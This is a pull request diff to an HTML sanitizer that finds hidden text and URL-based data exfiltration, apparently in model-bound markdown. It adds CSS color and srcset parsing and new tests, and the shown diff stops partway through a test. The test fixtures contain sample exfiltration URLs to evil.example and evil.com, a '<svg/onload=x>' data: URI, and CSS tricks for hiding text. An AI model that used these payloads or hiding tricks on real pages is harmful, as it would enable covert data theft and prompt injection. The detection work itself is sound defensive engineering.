### PR TITLE
fix(html): tighten hidden-content and exfil precision, close recall gaps

### DIFF
--- a/src/html.mjs
+++ b/src/html.mjs
@@ -180,12 +180,135 @@ function isConcreteColor(canonical) {
   return canonical === "transparent" || /^#[0-9a-f]{6}$/.test(canonical);
 }
 
+/** @param {number} n @returns {string} clamped two-hex-digit byte */
+function hexByte(n) {
+  return Math.max(0, Math.min(255, Math.round(n)))
+    .toString(16)
+    .padStart(2, "0");
+}
+
+/**
+ * Parse one rgb() channel: an integer/number `0..255` (clamped, as a browser
+ * clamps out-of-range) or a percentage `0%..100%` scaled to `0..255`. Returns
+ * null (fail open) on any other shape — a `none`/`calc()`/negative channel we
+ * cannot resolve to a concrete byte.
+ * @param {string} token
+ * @returns {number | null}
+ */
+function rgbChannel(token) {
+  const pct = token.match(/^\+?(\d*\.?\d+)%$/);
+  if (pct) return (Math.min(100, parseFloat(pct[1])) / 100) * 255;
+  const num = token.match(/^\+?(\d*\.?\d+)$/);
+  if (num) return parseFloat(num[1]);
+  return null;
+}
+
+/**
+ * Parse an hsl() hue as degrees (a `<number>` or an `<angle>` in
+ * deg/grad/rad/turn), normalized to `[0,360)`. Returns null on anything else.
+ * @param {string} token
+ * @returns {number | null}
+ */
+function hueDegrees(token) {
+  const match = token.match(/^([+-]?\d*\.?\d+)(deg|grad|rad|turn)?$/);
+  if (!match) return null;
+  const value = parseFloat(match[1]);
+  const unit = match[2] || "deg";
+  const deg =
+    unit === "grad"
+      ? (value * 360) / 400
+      : unit === "rad"
+        ? (value * 180) / Math.PI
+        : unit === "turn"
+          ? value * 360
+          : value;
+  return ((deg % 360) + 360) % 360;
+}
+
+/**
+ * Parse an hsl() saturation/lightness: a percentage or (CSS Color 4) a bare
+ * number, both read as `0..100` (clamped high). Returns null on any other shape.
+ * @param {string} token
+ * @returns {number | null}
+ */
+function hslPercent(token) {
+  const match = token.match(/^\+?(\d*\.?\d+)%?$/);
+  return match ? Math.min(100, parseFloat(match[1])) : null;
+}
+
+/**
+ * Convert HSL (`h` in degrees, `s`/`l` in `0..100`) to lowercase `#rrggbb`.
+ * @param {number} h @param {number} s @param {number} l @returns {string}
+ */
+function hslToHex(h, s, l) {
+  const sat = s / 100;
+  const light = l / 100;
+  const c = (1 - Math.abs(2 * light - 1)) * sat;
+  const hp = h / 60;
+  const x = c * (1 - Math.abs((hp % 2) - 1));
+  const [r, g, b] =
+    hp < 1
+      ? [c, x, 0]
+      : hp < 2
+        ? [x, c, 0]
+        : hp < 3
+          ? [0, c, x]
+          : hp < 4
+            ? [0, x, c]
+            : hp < 5
+              ? [x, 0, c]
+              : [c, 0, x];
+  const m = light - c / 2;
+  return `#${hexByte((r + m) * 255)}${hexByte((g + m) * 255)}${hexByte((b + m) * 255)}`;
+}
+
+/**
+ * Resolve an `rgb()/rgba()/hsl()/hsla()` function to `#rrggbb`, or
+ * `"transparent"` when its alpha channel is a literal zero (fully transparent
+ * text is invisible), or null when any component is unresolvable (fail open).
+ * Accepts the legacy comma form and the CSS Color 4 space/`/`-alpha form
+ * (`rgb(255 255 255 / 0.5)`, `hsl(0 0% 100%)`) and percentage channels.
+ * @param {string} value  lowercased, trimmed
+ * @returns {string | null}
+ */
+function canonicalizeColorFunction(value) {
+  const outer = value.match(/^(rgba?|hsla?)\(([^()]*)\)$/);
+  if (!outer) return null;
+  const isRgb = outer[1].startsWith("rgb");
+  let inner = outer[2].trim();
+  // Split the CSS Color 4 `<color> / <alpha>` form; a literal-zero alpha is
+  // fully transparent regardless of the color channels.
+  const slash = inner.split("/");
+  if (slash.length > 2) return null;
+  let alpha = slash.length === 2 ? slash[1].trim() : null;
+  if (slash.length === 2) inner = slash[0].trim();
+  const parts = inner.split(/[\s,]+/).filter(Boolean);
+  // The legacy comma form carries alpha as a 4th channel.
+  if (alpha === null && parts.length === 4) {
+    alpha = parts[3];
+    parts.length = 3;
+  }
+  if (alpha !== null && /^\+?0*\.?0+$/.test(alpha)) return "transparent";
+  if (parts.length !== 3) return null;
+  if (isRgb) {
+    const channels = parts.map(rgbChannel);
+    if (channels.some((c) => c === null)) return null;
+    return `#${channels.map((c) => hexByte(/** @type {number} */ (c))).join("")}`;
+  }
+  const h = hueDegrees(parts[0]);
+  const s = hslPercent(parts[1]);
+  const l = hslPercent(parts[2]);
+  if (h === null || s === null || l === null) return null;
+  return hslToHex(h, s, l);
+}
+
 /**
  * Canonicalize a CSS color to lowercase `#rrggbb` so `white`, `#FFF`,
- * `#ffffff`, and `rgb(255, 255, 255)` all compare equal. Returns the trimmed
- * lowercased input unchanged when it is not a form we recognize; callers gate
- * the same-color compare on isConcreteColor so an unresolved token (`var()`,
- * `inherit`) never falsely reads as a same-color hide.
+ * `#ffffff`, `rgb(255, 255, 255)`, `rgb(255 255 255)`, `rgb(100% 100% 100%)`,
+ * and `hsl(0 0% 100%)` all compare equal. Returns the trimmed lowercased input
+ * unchanged when it is not a form we recognize; callers gate the same-color
+ * compare on isConcreteColor so an unresolved token (`var()`, `inherit`) never
+ * falsely reads as a same-color hide.
  * @param {string} raw
  * @returns {string}
  */
@@ -201,27 +324,85 @@ function canonicalizeColor(raw) {
   if (shortHex)
     return `#${shortHex[1]}${shortHex[1]}${shortHex[2]}${shortHex[2]}${shortHex[3]}${shortHex[3]}`;
   if (/^#[0-9a-f]{6}$/.test(value)) return value;
-  const rgb = value.match(
-    /^rgba?\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*(?:,[^)]*)?\)$/,
-  );
-  if (rgb) {
-    /** @param {string} n */
-    const hex = (n) => Number(n).toString(16).padStart(2, "0");
-    return `#${hex(rgb[1])}${hex(rgb[2])}${hex(rgb[3])}`;
-  }
-  return value;
+  return canonicalizeColorFunction(value) ?? value;
 }
 
 // The leading color token of a `background` shorthand (the first token that
-// canonicalizes to a real color), so `background:#fff url(x)` still compares.
+// canonicalizes to a real color), so `background:#fff` still compares. Returns
+// "" (fail open, no same-color hide) when the shorthand carries an IMAGE layer
+// — `url(...)`, a gradient, or `image-set(...)`: the painted image can make
+// same-colored text perfectly readable over it (and if it fails to load the
+// element's own background shows through), so the flat color token is not
+// provably the rendered backdrop.
 /** @param {string} shorthand @returns {string} */
 function backgroundColor(shorthand) {
+  if (/\burl\(|gradient\(|image-set\(/i.test(shorthand)) return "";
   for (const token of shorthand.split(/\s+/)) {
     const color = canonicalizeColor(token);
     if (color && (color.startsWith("#") || color === "transparent"))
       return color;
   }
   return "";
+}
+
+// One resolved `inset()` edge collapses the box only when it is a percentage of
+// at least 50%: opposing edges (top/bottom, left/right) then sum to >=100% and
+// leave zero area. A length (`inset(200px)`), `calc()`, or `0` cannot be proven
+// to collapse without the box size, so it fails open (not collapsing).
+/** @param {string} edge @returns {boolean} */
+function isCollapsingInsetEdge(edge) {
+  const pct = edge.match(/^\+?(\d*\.?\d+)%$/);
+  return (
+    Boolean(pct) && parseFloat(/** @type {RegExpMatchArray} */ (pct)[1]) >= 50
+  );
+}
+
+// Expand an `inset()`'s 1–4 edge values to `[top, right, bottom, left]` using
+// the CSS margin-style shorthand rules.
+/** @param {string[]} parts @returns {string[]} */
+function expandInsetEdges(parts) {
+  const [t, r = t, b = t, l = r] = parts;
+  return [t, r, b, l];
+}
+
+/**
+ * True when a `clip-path` clips the element to nothing: `circle(0)`, or an
+ * `inset()` whose FOUR resolved edges ALL collapse (each a percentage >=50%).
+ * A partial inset that leaves any edge open (`inset(50% 0 0 0)` — bottom half
+ * visible) is NOT hidden: inspecting only the first value would over-splice it.
+ * Decorative clips (`circle(50%)`, small insets, polygons) render content and
+ * are left alone.
+ * @param {string} clipPath  lowercased, trimmed
+ * @returns {boolean}
+ */
+function isClipPathHidden(clipPath) {
+  if (/\bcircle\(\s{0,8}0(?![.\d])/.test(clipPath)) return true;
+  const inset = clipPath.match(/\binset\(([^)]*)\)/);
+  if (!inset) return false;
+  // Drop any `round <border-radius>` suffix, then read the edge list.
+  const parts = inset[1]
+    .split(/\bround\b/)[0]
+    .trim()
+    .split(/\s+/)
+    .filter(Boolean);
+  if (parts.length === 0 || parts.length > 4) return false;
+  return expandInsetEdges(parts).every(isCollapsingInsetEdge);
+}
+
+// Gradient-clipped / text-filled headings are VISIBLE despite `color:transparent`:
+// `background-clip:text` (or its `-webkit-` alias) paints the background through
+// the glyph shapes, and `-webkit-text-fill-color` overrides `color` for the fill.
+// Either signal means the transparent `color` is not the rendered text color, so
+// the same-`transparent` hide must fail open.
+/** @param {(key: string) => string} val @returns {boolean} */
+function isTextPaintedVisible(val) {
+  if (
+    val("background-clip") === "text" ||
+    val("-webkit-background-clip") === "text"
+  )
+    return true;
+  const fill = canonicalizeColor(val("-webkit-text-fill-color"));
+  return isConcreteColor(fill) && fill !== "transparent";
 }
 
 /** @param {(key: string) => string} val */
@@ -370,17 +551,8 @@ export function isHiddenStyle(styleStr) {
   if (isOffscreenOffset(val("text-indent"))) return true;
 
   // Clipped to nothing: the modern equivalent of the legacy `clip: rect(0…)`.
-  // `inset(50%)`…`inset(100%)` (including fractional `inset(99.9%)`) collapse
-  // the box, as does `circle(0)`. Decorative clips (`circle(50%)`, small
-  // `inset`s, polygons) render visible content and are left alone.
   const clipPath = val("clip-path");
-  if (
-    clipPath &&
-    /\b(?:inset\(\s{0,8}(?:[5-9]\d(?:\.\d+)?|100)%|circle\(\s{0,8}0(?![.\d]))/.test(
-      clipPath,
-    )
-  )
-    return true;
+  if (clipPath && isClipPathHidden(clipPath)) return true;
   if (isHidingTransform(val("transform"))) return true;
   if (isHidingFilter(val("filter"))) return true;
 
@@ -388,7 +560,10 @@ export function isHiddenStyle(styleStr) {
   // text are invisible to a human but plain text to the model. Colors are
   // canonicalized so `white`/`#fff`/`rgb(255,255,255)` mixes still compare.
   const color = canonicalizeColor(val("color"));
-  if (color === "transparent") return true;
+  // `color:transparent` alone hides text — UNLESS the glyphs are painted by a
+  // background-clip:text gradient or a concrete -webkit-text-fill-color, the
+  // standard gradient-heading recipe, in which case the text is visible.
+  if (color === "transparent" && !isTextPaintedVisible(val)) return true;
   const background =
     canonicalizeColor(val("background-color")) ||
     backgroundColor(val("background"));
@@ -651,26 +826,25 @@ const mdParser = unified().use(remarkParse).use(remarkGfm);
 const BOGUS_COMMENT_OPEN_RE = /<[!?]/g;
 
 /**
- * If `value.slice(at)` begins with an HTML comment (proper or bogus), return
- * the comment's end offset *within `value`* (exclusive); else null. Validated
- * against the real HTML tokenizer rather than a hand-rolled bogus-comment state
- * machine, so we splice exactly what a browser would hide and never a `<Foo>`
- * element, a `<!doctype>`, or visible prose.
+ * Map of comment start-offset -> end-offset (exclusive) for EVERY comment the
+ * HTML tokenizer finds in `value`, from a SINGLE rehype parse. Validated against
+ * the real tokenizer (parse5) rather than a hand-rolled bogus-comment state
+ * machine, so a bogus comment (`<!bogus>`, `<?php?>`, `<![CDATA[…]]>`) is spliced
+ * to exactly the span a browser hides and a `<Foo>` element, a `<!doctype>`, or
+ * visible prose never is. Replaces a per-candidate parse: the whole value is
+ * tokenized once and every span read from that tree.
  * @param {string} value
- * @param {number} at offset of a candidate `<!`/`<?` within `value`
- * @returns {number | null}
+ * @returns {Map<number, number>}
  */
-function bogusCommentEnd(value, at) {
-  const tree = /** @type {any} */ (
-    unified().use(rehypeParse, { fragment: true }).parse(value.slice(at))
-  );
-  // The slice starts at the candidate `<!`/`<?`, and an inline html node value
-  // is a single construct, so the first parsed child IS that construct: a
-  // `comment` node iff it tokenized to a (bogus) comment. A `<Foo>` element, a
-  // `<!doctype>` (dropped, leaving following text), or nothing else qualifies.
-  const first = tree.children[0];
-  if (!first || first.type !== "comment") return null;
-  return at + first.position.end.offset;
+function commentSpans(value) {
+  const tree = unified().use(rehypeParse, { fragment: true }).parse(value);
+  /** @type {Map<number, number>} */
+  const spans = new Map();
+  visit(tree, "comment", (/** @type {any} */ node) => {
+    if (node.position)
+      spans.set(node.position.start.offset, node.position.end.offset);
+  });
+  return spans;
 }
 
 /**
@@ -689,6 +863,10 @@ function bogusCommentEnd(value, at) {
  */
 function collectCommentRanges(value, base, nodeEnd, ranges) {
   BOGUS_COMMENT_OPEN_RE.lastIndex = 0;
+  // Tokenized bogus-comment spans, parsed once on first need (many values carry
+  // a proper `<!--` handled below without ever touching the tree).
+  /** @type {Map<number, number> | null} */
+  let spans = null;
   for (let match; (match = BOGUS_COMMENT_OPEN_RE.exec(value));) {
     const open = match.index;
     if (value.startsWith("<!--", open)) {
@@ -712,10 +890,11 @@ function collectCommentRanges(value, base, nodeEnd, ranges) {
       BOGUS_COMMENT_OPEN_RE.lastIndex = close + 3;
       continue;
     }
-    const end = bogusCommentEnd(value, open);
+    if (!spans) spans = commentSpans(value);
+    const end = spans.get(open);
     // Not a comment (a `<Foo>` element, a `<!doctype>`, visible prose): leave
     // it untouched and resume scanning just past this `<`.
-    if (end === null) continue;
+    if (end === undefined) continue;
     ranges.push({ start: base + open, end: base + end, kind: "comment" });
     BOGUS_COMMENT_OPEN_RE.lastIndex = end;
   }
@@ -986,7 +1165,7 @@ const BENIGN_BLOB_PARAM_RE =
 // OPAQUE, separator-free token, so the value must additionally contain a
 // contiguous 20+ char `[A-Za-z0-9_]` run (no hyphen/space — that's what splits
 // the prose runs below the bar) AND a digit before it counts as one.
-const OPAQUE_TOKEN_RE = /[A-Za-z0-9_]{20,}/;
+const OPAQUE_TOKEN_RE = /[A-Za-z0-9_]{20,}/g;
 const VALUE_HAS_DIGIT_RE = /\d/;
 
 // A value that is ENTIRELY a long base64 (40+ chars, optional `=` padding) or
@@ -1097,10 +1276,17 @@ function rawParams(qs) {
  */
 function paramExfilReason(name, value) {
   if (BENIGN_BLOB_PARAM_RE.test(name)) return null;
+  // A leaked credential is an OPAQUE, separator-free token. Gate the
+  // secret-shape/digit test on the CONTIGUOUS opaque run(s) of the value, not on
+  // the whole prose value: a benign path-like value (`?redirect=/authorization-
+  // service/…abcdefghij1234567890`) otherwise matches "authorization" in one
+  // place and a 20-char run in another and false-fires. Requiring both on the
+  // SAME run keeps `ghp_…`-style contiguous tokens firing while dropping prose.
+  const opaqueRuns = value.match(OPAQUE_TOKEN_RE);
   if (
-    OPAQUE_TOKEN_RE.test(value) &&
-    VALUE_HAS_DIGIT_RE.test(value) &&
-    matchesSecretHint(value)
+    opaqueRuns?.some(
+      (run) => VALUE_HAS_DIGIT_RE.test(run) && matchesSecretHint(run),
+    )
   )
     return "credential-shaped token in URL parameter";
   if (isBlobValue(value) || decodedBlobMatch(value))
@@ -1296,22 +1482,63 @@ function metaRefreshUrl(content) {
   return match ? match.groups.url : null;
 }
 
+// HTML whitespace per the `srcset` grammar (ASCII whitespace).
+const SRCSET_WS_RE = /[ \t\n\f\r]/;
+
 /**
- * Candidate URLs of a `srcset` (a comma-separated "url descriptor" string) or
- * `ping` (a space-separated url list rehype delivers as an array) attribute.
- * Each candidate's leading whitespace-delimited token is its url (the trailing
- * `2x`/`100w` descriptor, or extra ping urls, are dropped to the next
- * candidate). An absent attribute (neither string nor array) yields none.
+ * URLs of a `srcset` value, parsed per the WHATWG "parse a srcset attribute"
+ * grammar rather than a naive `split(",")`: a candidate's URL is a run of
+ * non-whitespace characters, so a URL that itself contains commas (a `data:`
+ * URI, or a query with `,`) is kept intact. A comma only separates candidates
+ * when it trails the URL run or follows the (paren-aware) descriptor. Trailing
+ * commas on the URL run mark a candidate with no descriptor.
+ * @param {string} value
+ * @returns {string[]}
+ */
+function parseSrcset(value) {
+  /** @type {string[]} */ const urls = [];
+  let i = 0;
+  const n = value.length;
+  while (i < n) {
+    while (i < n && (SRCSET_WS_RE.test(value[i]) || value[i] === ",")) i++;
+    const start = i;
+    while (i < n && !SRCSET_WS_RE.test(value[i])) i++;
+    const run = value.slice(start, i);
+    const url = run.replace(/,+$/, "");
+    if (url) urls.push(url);
+    // A URL run ending in a comma is a bare candidate (no descriptor); the
+    // comma already delimits the next one, so skip descriptor parsing.
+    if (run.endsWith(",")) continue;
+    // Otherwise consume the descriptor up to the first unparenthesized comma.
+    let depth = 0;
+    while (i < n) {
+      const c = value[i];
+      if (c === "(") depth++;
+      else if (c === ")" && depth > 0) depth--;
+      else if (c === "," && depth === 0) {
+        i++;
+        break;
+      }
+      i++;
+    }
+  }
+  return urls;
+}
+
+/**
+ * Candidate URLs of a `srcset` (a "url descriptor" string parsed per the HTML
+ * grammar) or `ping` (a space-separated url list rehype delivers as an array)
+ * attribute. An absent attribute (neither string nor array) yields none.
  * @param {unknown} value
  * @returns {string[]}
  */
 function multiUrlAttr(value) {
-  /** @type {string[]} */ let candidates = [];
-  if (Array.isArray(value)) candidates = value.map(String);
-  else if (typeof value === "string") candidates = value.split(",");
-  return candidates
-    .map((candidate) => candidate.trim().split(/\s+/)[0])
-    .filter(Boolean);
+  if (Array.isArray(value))
+    return value
+      .map((candidate) => String(candidate).trim().split(/\s+/)[0])
+      .filter(Boolean);
+  if (typeof value === "string") return parseSrcset(value);
+  return [];
 }
 
 /**

--- a/test/exfil-property.test.mjs
+++ b/test/exfil-property.test.mjs
@@ -65,14 +65,20 @@ const exfilCase = fc
       "html-a": `<a href="${url}">x</a>`,
       "html-img": `<img src="${url}">`,
     }[kind];
-    return { host, secret, doc };
+    return { host, doc, where };
   });
+
+const PLACEMENTS = ["query", "fragment", "path", "userinfo"];
 
 describe("property: detectExfil host never echoes the payload", () => {
   it("a flagged threat's target is the bare host, never the payload", () => {
-    let sawFlagged = 0;
+    // Per-PLACEMENT flagged counts, not a single run-wide counter: a run-wide
+    // count stays non-zero even if an entire placement (e.g. every `path` case)
+    // silently stopped flagging, making the property vacuous for it. Assert each
+    // placement flags at least once.
+    const flaggedByWhere = Object.fromEntries(PLACEMENTS.map((w) => [w, 0]));
     fc.assert(
-      fc.property(exfilCase, ({ host, doc }) => {
+      fc.property(exfilCase, ({ host, doc, where }) => {
         const threats = detectExfil(doc) ?? [];
         for (const threat of threats)
           assert.equal(
@@ -80,11 +86,15 @@ describe("property: detectExfil host never echoes the payload", () => {
             host,
             `target should be the bare host, got ${JSON.stringify(threat.target)}`,
           );
-        if (threats.length > 0) sawFlagged += 1;
+        if (threats.length > 0) flaggedByWhere[where] += 1;
       }),
       runOptions,
     );
-    assert.ok(sawFlagged > 0, "no doc was ever flagged — property vacuous");
+    for (const where of PLACEMENTS)
+      assert.ok(
+        flaggedByWhere[where] > 0,
+        `placement "${where}" never flagged — property vacuous there`,
+      );
   });
 });
 

--- a/test/html-corpus.test.mjs
+++ b/test/html-corpus.test.mjs
@@ -20,7 +20,14 @@ import assert from "node:assert/strict";
 import { sanitizeHtml, detectExfil, checkExfilUrl } from "../src/html.mjs";
 
 const CANARY = "CANARY_d41d8c";
-const hidden = (decl) => `<div style="${decl}">${CANARY}</div>`;
+// Visible framing bytes on either side of the hidden element (T9): a splice must
+// remove the canary WITHOUT touching the surrounding visible text. Kept on their
+// own paragraphs (blank lines) so the `<div>` stays a flow HTML block — the same
+// parse path the bare vectors originally exercised — while still being framed.
+const FRAME_L = "framingLeftVISIBLE";
+const FRAME_R = "framingRightVISIBLE";
+const hidden = (decl) =>
+  `${FRAME_L}\n\n<div style="${decl}">${CANARY}</div>\n\n${FRAME_R}`;
 const NEEDLE = "q9X2mN7pK4rT8wY1cV5bZ3dF6gH0jL2e";
 // RFC 4648 §5 url-safe base64 (`-`/`_` for `+`/`/`) carrying a contiguous 40+
 // alnum run — a payload that dodges the standard `[A-Za-z0-9+/]` blob arms.
@@ -31,9 +38,12 @@ const CORPUS = {
     { name: "display-none", input: hidden("display:none") },
     {
       name: "visibility-hidden",
-      input: `<span style="visibility:hidden">${CANARY}</span>`,
+      input: `${FRAME_L}\n\n<span style="visibility:hidden">${CANARY}</span>\n\n${FRAME_R}`,
     },
-    { name: "opacity-zero", input: `<p style="opacity:0">${CANARY}</p>` },
+    {
+      name: "opacity-zero",
+      input: `${FRAME_L}\n\n<p style="opacity:0">${CANARY}</p>\n\n${FRAME_R}`,
+    },
     { name: "offscreen-left", input: hidden("position:absolute;left:-9999px") },
     { name: "offscreen-top", input: hidden("position:fixed;top:-10000px") },
     {
@@ -99,11 +109,18 @@ const CORPUS = {
       input: hidden("color:#FFFFFF;background-color:rgb(255, 255, 255)"),
     },
     {
-      name: "black-on-black-shorthand",
-      input: hidden("color:#000;background:rgb(0,0,0) url(x)"),
+      name: "white-on-white-hsl",
+      input: hidden("color:hsl(0 0% 100%);background-color:white"),
     },
-    { name: "html-comment", input: `text<!-- ${CANARY} -->OK` },
-    { name: "bare-hidden-attr", input: `<div hidden>${CANARY}</div>` },
+    {
+      name: "html-comment",
+      input: `text<!-- ${CANARY} -->OK`,
+      keep: ["text", "OK"],
+    },
+    {
+      name: "bare-hidden-attr",
+      input: `${FRAME_L}\n\n<div hidden>${CANARY}</div>\n\n${FRAME_R}`,
+    },
     {
       // A malformed sibling declaration (`x`, no colon) must not blank
       // detection of the valid `display:none` next to it — a browser
@@ -119,14 +136,17 @@ const CORPUS = {
     {
       name: "hidden-span-in-heading",
       input: `# Title <span style="display:none">${CANARY}</span> end`,
+      keep: ["Title", "end"],
     },
     {
       name: "hidden-span-in-list-item",
       input: `- item <span hidden>${CANARY}</span> tail`,
+      keep: ["item", "tail"],
     },
     {
       name: "hidden-div-in-blockquote",
-      input: `> <div hidden>${CANARY}</div>\n> visible`,
+      input: `> visible-before\n> <div hidden>${CANARY}</div>\n> visible-after`,
+      keep: ["visible-before", "visible-after"],
     },
   ],
   reported: [
@@ -228,6 +248,15 @@ const CORPUS = {
       input: `<a href="/ok" ping="https://evil.example/t?exfil=${"A".repeat(44)}">x</a>`,
       reason: "suspicious query parameter",
       isImage: false,
+    },
+    {
+      // H6: a srcset candidate URL that itself contains commas (a data: URI)
+      // must survive candidate splitting intact. A naive split(",") shredded it
+      // into `data:image/svg+xml` + junk and missed the active-content payload.
+      name: "srcset-data-uri-with-comma",
+      input: `<img srcset="data:image/svg+xml,<svg/onload=x> 2x">`,
+      reason: "active-content data: URI",
+      isImage: true,
     },
   ],
   url: [
@@ -366,6 +395,21 @@ const CORPUS = {
     { name: "keyword-session-ok", input: "https://e.com/p?session=ok" },
     { name: "keyword-cursor-abc", input: "https://e.com/p?cursor=abc" },
     { name: "keyword-auth-ok", input: "https://e.com/p?auth=ok" },
+    {
+      // H4: a benign path-like value whose "authorization" keyword and 20-char
+      // run sit in DIFFERENT places must not read as a credential — the secret
+      // shape has to match on the same contiguous opaque run.
+      name: "authorization-redirect-path",
+      input:
+        "https://ok.example/callback?redirect=/authorization-service/session/abcdefghij1234567890",
+    },
+    {
+      // A prose value containing the word "token" split by hyphens is not a
+      // contiguous opaque credential run.
+      name: "token-word-in-prose-path",
+      input:
+        "https://ok.example/p?next=/reset-token-flow/step-2/confirmation-page-1234",
+    },
     { name: "small-data-image", input: "data:image/png;base64,iVBORw0KGgo=" },
     {
       name: "signed-cdn-link",
@@ -435,6 +479,39 @@ const CORPUS = {
       name: "small-negative-left",
       input: hidden("position:absolute;left:-5px"),
     },
+    // ── precision regressions for findings H1–H3 (must NOT splice) ──
+    {
+      // H3: a flat background color under a url() IMAGE layer is not provably
+      // the rendered backdrop — the image can paint over same-colored text.
+      name: "same-color-over-bg-image",
+      input: hidden("color:#000;background:rgb(0,0,0) url(dark.png)"),
+    },
+    {
+      name: "white-on-white-over-gradient",
+      input: hidden("color:#fff;background:#fff linear-gradient(#fff,#000)"),
+    },
+    {
+      // H1: gradient-clipped heading — transparent color, but the gradient is
+      // painted through the glyphs via background-clip:text.
+      name: "gradient-clipped-heading",
+      input: hidden(
+        "color:transparent;background:linear-gradient(90deg,#f00,#00f);-webkit-background-clip:text;background-clip:text",
+      ),
+    },
+    {
+      // H1: -webkit-text-fill-color overrides transparent `color` for the fill.
+      name: "text-fill-color-visible",
+      input: hidden("color:transparent;-webkit-text-fill-color:#111"),
+    },
+    {
+      // H2: only the top half is clipped — the bottom stays on screen.
+      name: "clip-path-inset-top-half",
+      input: hidden("clip-path:inset(50% 0 0 0)"),
+    },
+    {
+      name: "clip-path-inset-one-open-edge",
+      input: hidden("clip-path:inset(50% 50% 50% 10%)"),
+    },
     {
       name: "half-shift-vw",
       input: hidden("position:absolute;left:-50vw"),
@@ -503,10 +580,18 @@ const CORPUS = {
 };
 
 describe("corpus: hidden content never survives sanitizeHtml", () => {
-  for (const { name, input } of CORPUS.hidden) {
+  for (const { name, input, keep } of CORPUS.hidden) {
     it(`removes ${name}`, () => {
       const out = sanitizeHtml(input)?.text ?? input;
       assert.equal(out.includes(CANARY), false, `survived: ${name}`);
+      // The splice must be surgical: adjacent visible framing bytes survive
+      // byte-for-byte (T9). `keep` names them for custom vectors; the rest use
+      // the FRAME_L/FRAME_R sentinels the `hidden()` helper wraps around.
+      const framing =
+        keep ?? [FRAME_L, FRAME_R].filter((m) => input.includes(m));
+      assert.ok(framing.length > 0, `no framing asserted for ${name}`);
+      for (const marker of framing)
+        assert.ok(out.includes(marker), `framing "${marker}" lost in ${name}`);
     });
   }
 });

--- a/test/html.test.mjs
+++ b/test/html.test.mjs
@@ -122,6 +122,14 @@ const HIDDEN_STYLE_CASES = [
   ["clip-path:circle(50%)", false],
   ["clip-path:inset(10%)", false], // partial inset still shows content
   ["clip-path:inset(10px)", false],
+  ["clip-path:inset(50% 0 0 0)", false], // only the top half is clipped — bottom stays visible
+  ["clip-path:inset(50% 50%)", true], // 2-value: all four edges resolve to 50%
+  ["clip-path:inset(60% 70% 80% 90%)", true], // 4-value, every edge >=50%
+  ["clip-path:inset(50% 50% 50% 10%)", false], // one open edge (left 10%) keeps content visible
+  ["clip-path:inset(200px)", false], // length inset cannot be proven to collapse — fail open
+  ["clip-path:inset(50% round 10px)", true], // `round <radius>` suffix ignored
+  ["clip-path:inset()", false], // no edges — fail open
+  ["clip-path:inset(1% 2% 3% 4% 5%)", false], // too many edges — malformed, fail open
   // ── transform: scale / rotate edge-on / translate offscreen ──
   ["transform:scale(0)", true],
   ["transform:scale( 0)", true],
@@ -159,7 +167,29 @@ const HIDDEN_STYLE_CASES = [
   ["color:rgb(255,255,255);background:white", true], // rgb vs named
   ["color:white;background-color:rgb(255, 255, 255)", true],
   ["color:#000;background:rgb(0,0,0)", true], // black on black
-  ["color:white;background:#fff url(x) no-repeat", true], // background shorthand carries the color
+  // CSS Color 4 notations canonicalize for the same-color compare.
+  ["color:rgb(255 255 255);background:white", true], // space-separated rgb
+  ["color:rgb(100% 100% 100%);background:#fff", true], // percentage channels
+  ["color:hsl(0 0% 100%);background-color:white", true], // hsl white on white
+  ["color:hsl(0, 0%, 0%);background:#000", true], // legacy-comma hsl black on black
+  ["color:rgb(0 0 0 / 0);background:white", true], // zero alpha = transparent text
+  ["color:rgba(1,2,3,0);background:white", true], // legacy comma 4th-channel zero alpha
+  ["color:rgba(255,255,255,0.5);background-color:white", true], // non-zero alpha ignored for the hex compare
+  ["color:hsl(0 0% 100%);background:hsl(0 0% 50%)", false], // distinct hsl lightness
+  // hsl hue sectors (each 60° arc of the conversion) as same-color hides.
+  ["color:hsl(90 100% 50%);background-color:hsl(90 100% 50%)", true],
+  ["color:hsl(150 100% 50%);background-color:hsl(150 100% 50%)", true],
+  ["color:hsl(210 100% 50%);background-color:hsl(210 100% 50%)", true],
+  ["color:hsl(270 100% 50%);background-color:hsl(270 100% 50%)", true],
+  ["color:hsl(330 100% 50%);background-color:hsl(330 100% 50%)", true],
+  // hsl hue angle units and bare-number saturation/lightness (CSS Color 4).
+  ["color:hsl(200grad 100% 50%);background-color:hsl(0.5turn 100% 50%)", true], // 200grad === 0.5turn === 180deg
+  ["color:hsl(3.14159265rad 100 50);background-color:hsl(180 100% 50%)", true], // π rad === 180deg; bare-number s/l
+  ["color:rgb(none 0 0);background-color:rgb(none 0 0)", false], // unresolvable channel — fail open (not concrete)
+  ["color:hsl(0 nope 50%)", false], // unresolvable saturation — fail open
+  ["color:hsl(nope 100% 50%)", false], // unresolvable hue — fail open
+  ["color:rgb(1 2 3 / 4 / 5)", false], // two slashes — malformed, fail open
+  ["color:rgb(1 2)", false], // wrong channel count — fail open
   ["color:red", false],
   ["color:white", false], // color alone, no background — never infer the page bg
   ["color:white;background:#fefefe", false], // near-white but not equal
@@ -167,6 +197,15 @@ const HIDDEN_STYLE_CASES = [
   ["color:white;background-color:black", false],
   ["background-color:white", false], // color absent — not same-color
   ["color:rgb(0,0,0);background:rgb(255,255,255)", false],
+  // ── image-layer background: same flat color is not provably the backdrop ──
+  ["color:white;background:#fff url(x) no-repeat", false], // url image can paint over the text — fail open
+  ["color:#000;background:rgb(0,0,0) url(x)", false], // image layer, fail open
+  ["color:white;background:#fff linear-gradient(#fff,#000)", false], // gradient layer, fail open
+  // ── gradient-clipped / text-filled heading is visible despite transparent color ──
+  ["color:transparent;-webkit-background-clip:text", false],
+  ["color:transparent;background-clip:text", false],
+  ["color:transparent;-webkit-text-fill-color:#111", false], // fill color overrides transparent
+  ["color:transparent;-webkit-text-fill-color:transparent", true], // fill also transparent — still hidden
   // ── unresolved color tokens: can't prove same-color, so fail open ──
   ["color:var(--fg);background-color:var(--fg)", false], // same var, but resolves via cascade — not provably equal
   ["color:inherit;background:inherit", false], // inherit color != inherit background-color
@@ -799,6 +838,29 @@ describe("unit: detectExfil HTML-attr + node types", () => {
       `<img srcset="https://evil.com/p.png?data=${b64} 2x">`,
     );
     assert.equal(threat.isImage, true);
+    assert.equal(threat.target, "evil.com");
+  });
+  it("parses srcset per the descriptor grammar: candidate commas split, parens and commas-in-parens do not", () => {
+    // Candidate 1 has a parenthesized descriptor whose inner comma must NOT end
+    // the candidate; candidate 2 (after the real separator comma) is the exfil.
+    const threat = onlyThreat(
